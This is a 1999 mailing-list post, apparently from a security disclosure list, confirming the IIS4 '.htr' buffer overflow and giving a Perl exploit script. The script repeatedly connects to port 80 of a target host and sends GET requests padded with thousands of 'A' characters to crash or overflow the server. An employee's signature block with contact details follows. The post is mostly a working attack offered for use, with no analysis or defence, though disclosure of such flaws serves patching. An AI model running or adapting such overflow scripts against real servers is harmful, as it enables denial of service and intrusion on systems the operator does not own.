Re: Retina vs. IIS4, Round 2, KO Ryan R Permeh (rrpermeh@RCONNECT.COM) Tue, 15 Jun 1999 17:01:23 -0500 tested, this works for me... scripting was turned on... perl exploit code follows: #!/usr/bin/perl #props to the absu crew use Net::Telnet; for ($i=2500;$i<3500;$i++) { $obj=Net::Telnet->new( Host => "$ARGV[0]",Port => 80); my $cmd = "GET /". 'A' x $i . ".htr HTTP/1.0\n"; print "$cmd\n";$obj->print("$cmd"); $obj->close; } -- ---------------------------------------------------------------- Ryan R Permeh E-MAIL: rrpermeh@rconnect.com IS Engineer WEB : http://www.rconnect.com Rural Connections HELP : help@rconnect.com FAQ : http://www.rconnect.com/help SALES : sales@rconnect.com ---------------------------------------------------------------- 120 First Street NE PHONE : (507) 281-5005 Rochester, MN 55906 FAX : (507) 281-9272